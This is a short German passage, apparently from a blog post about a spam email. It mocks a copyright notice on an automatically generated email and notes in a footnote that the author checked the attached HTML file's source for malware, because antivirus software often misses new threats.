Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.